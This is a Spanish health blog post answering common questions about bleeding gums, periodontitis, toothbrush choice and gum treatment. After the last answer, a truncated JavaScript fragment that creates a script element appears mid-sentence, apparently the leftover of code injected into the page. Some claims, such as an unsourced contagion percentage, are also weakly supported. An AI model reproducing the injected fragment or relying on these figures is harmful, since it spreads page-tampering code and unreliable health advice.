Salud y belleza » Salud dental

Sobre encías sangrantes y otras hierbas II

Sin Comentarios

¿Son contagiosas las enfermedades de las encías?

Como toda infección producida por bacterias, la periodontitis puede contagiarse. Recientes estudios de investigación han demostrado que aquellos sujetos que conviven durante años con un enfermo de periodontitis tienen, en efecto, un 65% más de probabilidades de desarrollar la enfermedad.

Las formas de contagio son todas aquellas que impliquen contacto directo (desde un beso hasta compartir un cepillo de dientes).

¿Cuáles son los primeros síntomas para detectar que mis encías no están sanas en un 100%?.

Los principales síntomas son el sangrado directo o con el cepillado, el enrojecimiento de la zona, la aparición de pus en la encía, el mal olor de boca, el mal sabor de boca, dolor e incluso movilidad de las piezas dentales.

Aún así, más allá de estas pruebas de fácil reconocimiento, el diagnóstico final sólo puede ser realizado por un especialista. Ante la menor duda o la presencia de alguno de esos síntomas, debemos acudir de inmediato ante un profesional.

¿El sangrado de la encía siempre implica algún problema o enfermedad de las encías?

No necesariamente. A veces las encías pueden sangrar por otros factores que nada tienen que ver con situaciones peligrosas o enfermedades. A menudo, en ciertas ocasiones o etapas aparece una tendencia aumentada al sangrado de encía.

De todos modos, cuando el problema se vuelve crónico, es probable que se trate de un cuadro de gingivitis (que puede desembocar en una periodontitis).

¿Qué tipo de cepillo dental debo utilizar y cuándo debo cambiarlo?

Un gran cepillo dental debe ser pequeño, anatómico para de esta manera calzar la mayor parte de zonas posibles de la boca. Es necesario también que el cepillo disponga de cerdas de nylon, de dureza intermedia para no dañar la encía y arqueado en el mango para manejarlo de forma fácil y práctica.

Ningún cepillo de dientes debiera usarse por más de treinta días pues las cerdas se aflojan.

¿Cuál es la forma de tratar las enfermedades de la encía?

En el caso de la gingivitis es suficiente con mejorar la higiene oral y profilaxis periodontales que son actuaciones preventivas rápidas y fáciles. Pero, en cambio, cuando se trata de un problema como las periodontitis el panorama cambia: en primer lugar se realiza un detenido estudio periodontal clínico y radiológico, para valorar la situación (como dijimos antes, son varias las clases de periodontitis que existen).

En base a eso, se efectuará un tratamiento dirigido a eliminar las bacterias de la bolsa periodontal (se lo denominado “raspado”). Una vez que la enfermedad está controlada da comienzo el mantenimiento periodontal: un pormenorizado seguimiento y mantenimiento de la salud dental que implica higiene detallada y exhaustiva y hasta una dieta especial.

Más información sobre encías sangrantes} else {var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : , , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.